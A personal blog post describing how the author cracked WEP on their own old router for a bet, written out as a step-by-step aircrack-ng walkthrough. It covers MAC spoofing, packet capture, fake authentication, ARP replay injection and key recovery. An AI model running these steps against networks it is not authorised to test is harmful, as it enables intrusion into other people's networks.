I had a bet with a friend of mine (for a case of beer) that I could crack a fake WEP encrypted access point in under 5 minutes using my rather old Packard Bell Easynote Skype Edition.
There are a few things to note, I used an old WEP only router that I was about to dump. I never saw the password and couldn’t ask for hints. I also found out that my piece of shit laptop can’t be booted from a DVD, hence having to use Backtrack 3 instead of Backtrack 5.
After Backtrack 3 was downloaded, burnt to disk, booted up and a shell opened.
The drivers loaded automagically are the wrong ones. If you have the Easynote Skype edition, you’ll notice this as the WiFi light on the Wifi button fails to come on.
Unload the wireless drivers
modprobe -r iwl3945
Load in the correct drivers
Stop the Wireless card
airmon-ng stop wifi0 ifconfig wifi0 down
Change the MAC address
macchanger --mac 00:11:22:33:44:55 wifi0
Start up Airmon, to monitor the AP in the area
After finding the access point, and noting it’s BSSID and Channel
airodump-ng -c CHANNEL_NUMBER -w FILE.OUT --bssid BSSID_HERE wifi0
Open up a new terminal, leaving airodump to run in Terminal 1.
Inject some fake packets on Terminal 2
aireplay-ng -1 0 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0
Airodump’s #Data column should start filling up. When it gets to about 100, kill the injection.
In Terminal 2, we’ll replay the packets we faked earlier
aireplay-ng -3 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0
You should now see the # Data shoot up! Leave it run until #Data reaches about 50k. Close Terminal 2 and kill airodump in Terminal 1.
aircrack-ng -b BSSID_HERE FILE.OUT.cap
After about 15 seconds, you should have the wireless password.